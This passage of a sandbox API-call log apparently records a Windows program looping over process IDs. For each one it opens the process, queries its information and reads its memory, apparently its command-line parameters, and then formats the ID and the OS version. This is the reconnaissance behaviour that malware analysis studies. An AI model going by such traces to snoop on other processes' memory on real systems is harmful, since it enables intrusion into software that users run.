lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.949] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.949] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.949] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2fa020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.950] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x551270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.950] malloc (_Size=0x74) returned 0xd9d190 [0264.950] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5518f4, lpBuffer=0xd9d190, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.951] free (_Block=0xd9d190) [0264.953] CloseHandle (hObject=0x28c) returned 1 [0264.953] _ui64tow_s (in: _Value=0x1150, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4432") returned 0x0 [0264.954] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4432") returned 4 [0264.954] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.954] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.997] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1150) returned 0x28c [0264.997] GetLastError () returned 0x0 [0264.997] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.997] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x22c018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.997] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.997] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d1c90, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.998] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d1888, lpBuffer=0x138c580, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.998] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.998] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.998] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x22c020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.999] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.999] malloc (_Size=0x76) returned 0xd9d190 [0264.999] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4d18f6, lpBuffer=0xd9d190, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0265.001] free (_Block=0xd9d190) [0265.001] CloseHandle (hObject=0x28c) returned 1 [0265.001] _ui64tow_s (in: _Value=0x1158, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4440") returned 0x0 [0265.001] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4440") returned 4 [0265.001] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.002] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.003] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1158) returned 0x28c [0265.003] GetLastError () returned 0x0 [0265.003] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0265.003] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x328018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0265.003] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0265.004] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x531c50, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0265.004] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x531888, lpBuffer=0x138c580, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0265.004] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0265.004] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0265.004] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x328020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0265.005] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x531270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0265.005] malloc (_Size=0x64) returned 0xdb03b0 [0265.005] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5318e4, lpBuffer=0xdb03b0, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb03b0*, lpNumberOfBytesRead=0x0) returned 1 [0265.006] free (_Block=0xdb03b0) [0265.006] CloseHandle (hObject=0x28c) returned 1 [0265.006] _ui64tow_s (in: _Value=0x1160, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4448") returned 0x0 [0265.007] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4448") returned 4 [0265.007] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.007] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.008] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1160) returned 0x28c [0265.008] GetLastError () returned 0x0 [0265.009] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0265.009] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2cc018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0265.009] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0265.009] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4c1c60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0265.009] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4c1888, lpBuffer=0x138c580, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0265.010] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0265.010] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0265.010] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2cc020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0265.010] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4c1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0265.011] malloc (_Size=0x66) returned 0xdafe70 [0265.011] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4c18e6, lpBuffer=0xdafe70, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdafe70*, lpNumberOfBytesRead=0x0) returned 1 [0265.011] free (_Block=0xdafe70) [0265.012] CloseHandle (hObject=0x28c) returned 1 [0265.012] _ui64tow_s (in: _Value=0x1168, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4456") returned 0x0 [0265.012] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4456") returned 4 [0265.012] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.012] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.014] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1168) returned 0x28c [0265.014] GetLastError () returned 0x0 [0265.014] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0265.014] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x32e018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0265.014] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0265.015] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1c90, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0265.015] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1888, lpBuffer=0x138c580, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0265.015] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0265.015] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0265.016] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x32e020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0265.016] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0265.016] malloc (_Size=0x7a) returned 0xd9d190 [0265.016] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a18fa, lpBuffer=0xd9d190, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0265.018] free (_Block=0xd9d190) [0265.018] CloseHandle (hObject=0x28c) returned 1 [0265.018] _ui64tow_s (in: _Value=0x1170, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4464") returned 0x0 [0265.019] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4464") returned 4 [0265.019] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.019] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.020] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1170) returned 0x28c [0265.020] GetLastError () returned 0x0 [0265.020] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0265.020] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a3018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0265.020] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0265.021] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x331c70, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0265.021] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x331888, lpBuffer=0x138c580, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0265.021] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0265.022] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0265.022] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a3020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0265.022] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x331270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0265.022] malloc (_Size=0x70) returned 0xd9d190 [0265.022] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3318f0, lpBuffer=0xd9d190, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0265.023] free (_Block=0xd9d190) [0265.023] CloseHandle (hObject=0x28c) returned 1 [0265.023] _ui64tow_s (in: _Value=0x1178, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4472") returned 0x0 [0265.024] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4472") returned 4 [0265.024] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.024] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.025] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1178) returned 0x28c [0265.025] GetLastError () returned 0x0 [0265.025] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0265.025] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x35c018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0265.025] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0265.025] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5b1c70, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0265.026] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5b1888, lpBuffer=0x138c580, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0265.026] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0265.026] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0265.026] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x35c020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0265.026] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5b1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0265.027] malloc (_Size=0x6c) returned 0xd9d190 [0265.027] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5b18ec, lpBuffer=0xd9d190, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0265.027] free (_Block=0xd9d190) [0265.028] CloseHandle (hObject=0x28c) returned 1 [0265.028] _ui64tow_s (in: _Value=0x1240, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4672") returned 0x0 [0265.028] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4672") returned 4 [0265.028] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.028] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.029] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1240) returned 0x28c [0265.029] GetLastError () returned 0x0 [0265.029] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0265.029] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x334018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0265.029] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0265.030] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x521dd0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0265.030] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x521988, lpBuffer=0x138c580, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0265.030] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0265.030] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0265.030] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x334020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0265.030] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x521370, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0265.031] malloc (_Size=0xbc) returned 0xd9d190 [0265.031] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5219f4, lpBuffer=0xd9d190, nSize=0xba, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0265.032] free (_Block=0xd9d190) [0265.032] CloseHandle (hObject=0x28c) returned 1 [0265.033] _ui64tow_s (in: _Value=0x1338, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4920") returned 0x0 [0265.033] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4920") returned 4 [0265.036] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0265.036] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0265.070] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1338) returned 0x28c [0265.070] GetLastError () returned 0x0 [0265.070] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0265.070] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2e1018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0265.070] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0265.071] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403670, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0265.071] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4032b2, lpBuffer=0x138c580, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0265.071] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0265.072] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0265.072] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2e1020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, 